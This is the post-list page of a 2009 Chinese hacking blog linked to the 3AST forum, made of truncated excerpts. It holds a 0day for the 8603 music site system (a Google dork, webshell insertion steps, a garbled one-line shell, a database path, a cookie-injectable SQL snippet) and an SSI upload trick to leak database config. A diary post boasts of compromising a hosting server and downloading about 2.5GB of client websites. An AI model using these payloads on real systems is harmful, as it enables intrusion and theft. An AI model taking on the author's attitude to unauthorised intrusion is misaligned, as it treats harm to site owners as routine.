文章列表

2009年11月16日星期一下午 03:23

相对来说,网上的资料少之又少,很少有人对内网渗透写出一些详细的资料以供同行们参考
今天在这,只是大致的讲一下内网的一些知识.
首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了.但是,如果你的目标是一个大WEB,或者一个大公司,那你就必须考虑内网的问题.
在我们的渗透过程中,很多大型网络的外部网站或是服务器不一定有用,当然外网也可以作为我们的一个突破口,
毕竟没有经过尝试,我们也不知道里面的结构,至少在外部上我们可以获取一定的信息也说不定,但是对于内网,
外网绝对

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

8603音乐网管理系统0day

2009年11月16日星期一下午 03:22

8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入
数据库未作任何处理,可以插入一句话.继续插入经典一句话.┼攠數畣整爠煥敵瑳∨≡┩愾密码a
Google:inurl:player.asp?classid打开网页,点击请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可.数据库地址:/data/%23datalink.asa
二,classid处可以Cookies注入
classid=request("classid")
set rs1=server.createobject("adodb.recordset")
rs1.open "select * from feilei where classid="&classid,co

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

查找管理员后台的一个技巧

2009年11月16日星期一下午 03:22

T00LS里看来的.
当我们知道一个网站的后台目录,却又无法确定后台登陆文件的时候,可以尝试在网址后面加上一个"."
比如http://www.xxx.com/admin,我们打开后显示的是Directory Listing Denied,意思也就是说找不到此目录的默认首页,
那么我们可以把地址改成www.xxx.com./admin,注意com后面多了一个".",这样的话可以直接跳转到登陆页面.
T00LS里说貌似只有在IIS下才可会出现这样的情况,我找了几个站

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时

2009年11月16日星期一下午 03:21

方法:上传一个shtm文件, 内容为:
直接请求这个shtm文件,conn.asp就一览无遗, 数据库路径也就到手啦
解析:就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示conn.asp其中的内容.
前提:服务器的对shtm或者shtml的扩展没有

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

热烈祝贺3AST论坛注册人数达到10000人

2009年11月11日星期三下午 12:10

热烈祝贺3AST论坛注册人数达到10000人

恭喜恭喜，前几天还进了个3AST.COM国际域名

类别：默认分类 | 评论(1) | 浏览()

热烈祝贺3AST.COM正式属于3AST旗下

2009年11月11日星期三下午 12:06

今天3AST.COM正式抢注成功，从德国佬的手中抢了过来

正式属于我们站自己的了

现在访问http://www.3ast.com 也可以到

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

【原创】危险的校内人气之星

2009年11月03日星期二下午 10:54

原创作者：柔肠寸断 790653916 www.3ast.com.cn

本文已经发表在《黑客X档案》2009年第11期，转载请注明出处，谢谢您对作者的支持

作为SNS的领头人之一，校内（现已改名人人）已经吸引了上万的大学生

阅读全文>>

类别：原创 | 评论(0) | 浏览()

【精品资料】网络赚钱宝库共3G 视频+代码+资料

2009年09月02日星期三下午 04:04

http://item.taobao.com/auction/item_detail.jhtml?x_id=0db2&item_id=7b1691b990194d554c82785826643bf4

阅读全文>>

类别：个人日记 | 评论(2) | 浏览()

琢磨着无线局域网终于连上网了

2009年08月04日星期二下午 05:11

自己的3G到期了，我在小房间上不了网，其他房间还有台宽带上网的笔记本，有无线网卡，就琢磨着怎么搞个无线局域网

网上找资料呗~~找了一堆，也跟着后面做，不过奇怪的是总是不成功，网上有说买一个无线路由器，NND，没那么多钱。

发扬革命的精神，自力更生，局域网是连接成功了，可是客户机访问不了Internet。我汗~~~

想了几个方法：

1、网上说的共享Internet连接。

2、在“服务器”上双开个3389，加个用户，到时候可以连接上这个用户玩

阅读全文>>

类别：个人日记 | 评论(0) | 浏览()

无聊ing，守候ing。。。

2009年07月16日星期四下午 06:35

昨天看教程，某黑友入侵了一个服务器，然后自己也就琢磨着进去看看，可是关键的上传页面都给删除了，就旁注啊~~~RP不错，边录制边入侵，还真拿下服务器了。O(∩_∩)O~NND，服务器是虚拟机，不过好歹挂了有50多网站把~~人家是网络公司，做出的网页一定都不赖的，邪恶的想法油然而生。。

全部50多文件夹压缩，一共有2.5G左右的大小，压缩到800MB，直接用服务器上传到我的QQ邮箱中转站，然后今天自己慢慢的下载。。。。

俺是潮人，用的是3G，无线。网速也不算快，这个下载速度基本在170KB/S左右，家里的ADSL不过也就1

阅读全文>>

类别：个人日记 | 评论(1) | 浏览()

真巧。。。

2009年07月16日星期四下午 06:34

昨日在XX群里，看到那个叫“耶稣”的头像亮着，心里知道是3hack的站长，就去加聊聊，过去发生过一些不愉快的事情，但是我们之间并没有接触过。3hack貌似在圈内经常受到别人攻击，不幸的是3hack和我们3AST在一个服务器上。。这就不免3AST受到影响，3AST曾经被跨站，为了跨到3hack上去，3HACK经常受到DDOS，对3AST的影响就不用说了。

知道耶稣是安徽的，因为我看到过3hack的备案号是皖XXXX，我也是。加了耶稣的QQ之后，马上发了个图片抓包得到他IP，一查，晕~~竟然和我一个城市，老乡。

世上有这么巧的事

阅读全文>>

类别：个人日记 | 评论(0) | 浏览()

邀请码感想

2009年07月16日星期四下午 06:34

自从2009-5-23之后，论坛开启了邀请码注册。原因很简单，各位管理每天都有忙着自己的事情要做，论坛不免会出现大量的广告贴，一个论坛如果被广告贴占满了，就像是一亩菜田，长满了杂草，让人心烦，让人心寒。

邀请码注册，也是为了更多的有技术的朋友进来，门槛就是要做友情链接，但是让人失望的是，很多申请邀请码的会员，连基础的友情链接都不会做，有的人更是直接说要来论坛下载QQ空间查

阅读全文>>

类别：个人日记 | 评论(1) | 浏览()

关于最近校内自动分享以及篡改日志问题分析

2009年06月16日星期二下午 11:47

传播方式:Ajax蠕虫强制性分享一篇

《十二星男女生爱情大骗术（哇咧~天秤好准~！！！>

http://blog请勿访问.xiaonei.com/GetEntry.do?id=369970722&owner=229461699）
配合钓鱼（Phishing）式攻击。

特征：自动在日志中加入“最后推荐一个东西：发现了好软件，QQ千里眼，能够强制与任何QQ视频，能够强制加好友，强制聊天，迫使下线！下载地址”
威胁：初步诊断为QQ盗号工具(李明反映说有人

阅读全文>>

类别：个人日记 | 评论(0) | 浏览()

3.A.S.T改版，邀请码发放贴

2009年05月24日星期日下午 12:02

给坛子改了一下午。增加了不少的功能，一个坛子还是要功能多多的才好玩

顺便实施邀请注册了，我现在就送来我blog朋友一些我论坛邀请码把

虽然不值什么钱，但也希望朋友们有时间就去给我捧捧场

大家的交流才是最重要的

还有就是论坛才改版，还有很多不足的地方，欢迎大家提出来。谢谢各位兄弟咯

拿了邀请码的兄弟顺便在下面说下啊，谢咯

坛子地址

http://www.3ast.com.cn